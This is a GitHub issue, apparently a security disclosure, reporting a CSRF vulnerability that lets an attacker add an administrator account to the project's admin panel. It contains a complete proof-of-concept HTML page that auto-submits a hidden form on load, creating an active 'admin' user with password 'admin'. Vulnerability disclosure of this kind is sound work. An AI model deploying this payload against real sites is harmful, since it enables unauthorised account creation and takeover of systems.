Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
CSRF vulnerability There is a CSRF vulnerability to add an administrator account After the administrator logged in, open the following page poc Hack.html-----add an administrator accoun
<html><body> <script type="text/javascript"> function post(url,fields) { var p = document.createElement("form"); p.action = url; p.innerHTML = fields; p.target = "_self"; p.method = "post"; p.enctype ="multipart/form-data"; document.body.appendChild(p); p.submit(); } function csrf_hack() { var fields; fields += "<input type='hidden' name='username' value='admin' />"; fields += "<input type='hidden' name='email' value='1620449914@qq.com' />"; fields += "<input type='hidden' name='pass' value='admin' />"; fields += "<input type='hidden' name='userrole[]' value='1' />"; fields += "<input type='hidden' name='active' value='1' />"; var url = "http://192.168.0.103/cm/update_rows/user"; post(url,fields); } window.onload = function() { csrf_hack();} </script> </body></html>
Screenshots 1 Access dangerous pages 2 Found that an administrator has been added Impact version
The text was updated successfully, but these errors were encountered:
vzuburlis
No branches or pull requests
CSRF vulnerability
There is a CSRF vulnerability to add an administrator account
After the administrator logged in, open the following page
poc
Hack.html-----add an administrator accoun
Screenshots



1 Access dangerous pages
2 Found that an administrator has been added
Impact version
The text was updated successfully, but these errors were encountered: